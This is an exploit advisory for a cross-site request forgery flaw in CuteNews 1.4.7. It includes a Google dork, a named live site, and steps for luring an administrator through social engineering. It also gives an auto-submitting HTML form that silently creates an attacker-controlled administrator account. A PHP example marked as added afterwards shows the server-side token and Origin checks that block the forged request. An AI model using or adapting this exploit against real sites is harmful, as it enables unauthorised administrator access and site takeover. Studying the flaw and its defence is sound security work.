Cute News 1.4.7 Cross Site Request Forgery
Posted on 27 June 2012
In The Name Of Allah
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title: Cute News - Add admin CSRF Vulnerability
# Date : 2012-06-26
# Author : Black-Hole
# Vendor : http://cutephp.com/
# Version: 1.4.7
# E-Mail: Gigelaknak [at] Yahoo [dot] com
# Visit us: Ashiyane.org/forums
# Category: Webapps
# Google dork: "Powered by CuteNews 1.4.7"
# Demo site: http://www.rightclickimaging.co.uk/news/
# Team : Ashiyane Digital Security Team
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

1. Replace http://localhost/cutenews/ on the second line of the exploit code with your target path.
2. Replace test1 with your username, test2 with your password, test3 with your nickname and Gigelaknak@yahoo.com with your e-mail.
3. Save the exploit code as an .html file and upload it somewhere, then give the link to the admin using social engineering!

Tnx 2 N.A HiDdeEn, Hijacker, Virangar, Iman_taktaz ... And all Iranian Hackers ...
Special Tnx 2 All Ashiyane Members ...

Exploit Code :

<html>
<form method=post action="http://localhost/cutenews/index.php" name=csrf>
<input type=hidden name=regusername value=test1>
<input type=hidden name=regpassword value=test2>
<input type=hidden name=regnickname value=test3>
<input type=hidden name=regemail value=gigelaknak@yahoo.com>
<select name=reglevel>
<option value=1>1 (administrator)</option>
<input type=submit value="Add User">
<input type=hidden name=action value=adduser>
<input type=hidden name=mod value=editusers>
</select>
</form>
<script>document.csrf.submit();</script>
</html>
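The forged form above succeeds because the add-user request carries nothing an outside page cannot supply. The following is an added example of the server-side check that rejects it; it is not code from the advisory or from CuteNews, and the function names and the csrf_token field are hypothetical.

```php
<?php
// Added illustration, not CuteNews code. In a real handler $session would be
// $_SESSION after session_start(), $post would be $_POST, $server would be $_SERVER.

// Return the per-session anti-CSRF token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True when Origin (or, failing that, Referer) names our own host.
// A request with neither header is treated as cross-site and refused.
function same_origin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Gate for state-changing requests such as action=adduser, mod=editusers.
function allow_state_change(array $post, array $server, array &$session, string $expectedHost): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    if (!same_origin($server, $expectedHost)) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    // Constant-time comparison against the token bound to the admin's session.
    return is_string($sent) && hash_equals(csrf_token($session), $sent);
}

// Constructed requests mirroring the fields of the form in this advisory.
$session = [];
$token   = csrf_token($session);
$fields  = ['action' => 'adduser', 'mod' => 'editusers', 'regusername' => 'test1', 'reglevel' => '1'];

// Auto-submitted from another site: foreign Origin, no token.
$forged = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
// Submitted from the admin panel's own form, which embeds the token.
$legit  = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://localhost'];

var_dump(allow_state_change($fields, $forged, $session, 'localhost'));
var_dump(allow_state_change($fields + ['csrf_token' => $token], $legit, $session, 'localhost'));
```

The token must be written into every admin form as a hidden field; setting the session cookie with SameSite=Lax or Strict adds a second layer against cross-site POSTs.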
